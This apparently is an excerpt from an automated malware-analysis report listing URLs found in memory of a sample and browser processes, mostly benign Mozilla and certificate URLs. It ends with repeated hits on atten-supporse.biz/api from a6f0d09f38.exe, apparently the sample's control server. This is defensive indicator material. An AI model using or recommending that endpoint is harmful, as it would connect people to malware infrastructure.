Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsShowLessFrequentlyCap
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsUITreatment
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThreshold
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryUseCountThreshold
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchBlockingEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchEnabledhttp://mozilla.org/#/properties/mdnFeatureGate
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/experimentType
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/exposureResults
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isBestMatchExperiment
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoClientVariants
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEndpointURL
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoProviders
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoTimeoutMs
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/originsAlternativeEnable
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/originsDaysCutOff
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesAlternativeEnable
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesHalfLifeDays
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesHighWeight
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesLowWeight
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesMediumWeight
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesNumSampledVisits
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pocketFeatureGate
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pocketShowLessFrequentlyCap
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestions
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestBlockingEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestDataCollectionEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredIndex
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScenario
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScoreMap
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showExposureResults
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywords
Source: firefox.exe, 0000001C.00000003.2754238638.000001DEF705F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2910065957.000001DEF1F3B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2728904832.000001DEEEC71000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2758502866.000001DEF6A31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2786698706.000001DEEF9FE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2828014808.000001DEF6A28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2812300663.000001DEF05CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2729546937.000001DEEEC71000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755426525.000001DEF6930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3047167053.000001DEEC13C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2910065957.000001DEF1F25000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC962000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756065289.000001DEF6A89000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756197782.000001DEF6AB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2847420090.000001DEF6AAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2833254348.000001DEF0316000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2920506033.000001DEF124C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2786698706.000001DEEF9D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755005207.000001DEF702A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3057071342.000001DEEC977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 0000001C.00000002.3003513879.000001DEEA97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 0000001C.00000003.2894687735.000001DEF7046000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 0000001C.00000003.2910065957.000001DEF1F31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB946000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 0000001C.00000003.2910065957.000001DEF1F31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB946000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2894687735.000001DEF7046000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: SxQyhJr.exe, 00000007.00000002.2431381161.0000000003059000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: firefox.exe, 0000001C.00000002.3003513879.000001DEEA97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: firefox.exe, 0000001C.00000002.3003513879.000001DEEA97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEADAA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEADA6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2923386485.000001DEF11EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000001C.00000003.2923613146.000001DEF11C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulJ
Source: firefox.exe, 0000001C.00000003.2923386485.000001DEF11EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulP
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulbrowser.sessionstore.upgradeBackup.maxU
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://extensions/content/parent/ext-
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://passwordmgr/locale/passwordmgr
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulcreateNotificationMessageElement/setAle
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulopenPreferences/internalPrefCategoryNam
Source: firefox.exe, 0000001F.00000003.2739221096.000001D14F53D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2738035698.000001D14F53D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2970101056.000001D14F53D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.videolan.org/x264.html
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2910065957.000001DEF1F31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2894687735.000001DEF7046000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2910065957.000001DEF1F31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2894687735.000001DEF7046000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2719907749.000001DEEE700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720959869.000001DEEC184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720400561.000001DEEC141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720790655.000001DEEC163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/autocomplete-richlistitem
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 0000001C.00000003.2910065957.000001DEF1F68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.c
Source: firefox.exe, 0000001C.00000003.2904698358.000001DEF249F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 0000001C.00000003.2754238638.000001DEF7083000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001C.00000002.3057721005.000001DEECA42000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3057721005.000001DEECA28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/enhancer-for-youtube/
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/facebook-container/
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/reddit-enhancement-suite/
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/to-google-translate/
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/wikipedia-context-menu-search/
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9D77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads-us.rd.linksynergy.com/as.php
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: a6f0d09f38.exe, 0000000D.00000002.2958708829.0000000001258000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573323312.00000000012B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/
Source: a6f0d09f38.exe, 0000000D.00000003.2901005763.0000000001258000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2958708829.0000000001258000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/L
Source: a6f0d09f38.exe, 0000000D.00000003.2681690134.00000000012BE000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2678528544.00000000012BE000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2656607404.00000000012C0000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2682957855.00000000012BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/ac
Source: a6f0d09f38.exe, 0000000D.00000003.2700729601.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2681690134.00000000012CF000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2782069671.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2678594723.00000000012CD000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2782468344.00000000012CD000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2656804081.00000000012BA000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2656627484.00000000012B9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2682957855.00000000012CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/api
Source: a6f0d09f38.exe, 0000000D.00000003.2700729601.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2681690134.00000000012CF000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2782069671.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2678594723.00000000012CD000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2782468344.00000000012CD000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2682957855.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/api3Co
Source: a6f0d09f38.exe, 0000000D.00000003.2700729601.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2782069671.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2782468344.00000000012CD000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2682957855.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2961232201.00000000012CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apiPC
Source: a6f0d09f38.exe, 0000000D.00000003.2656627484.00000000012B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz/apibV7Ryd
Source: a6f0d09f38.exe, 0000000D.00000003.2781341437.0000000005B85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://atten-supporse.biz:443/api
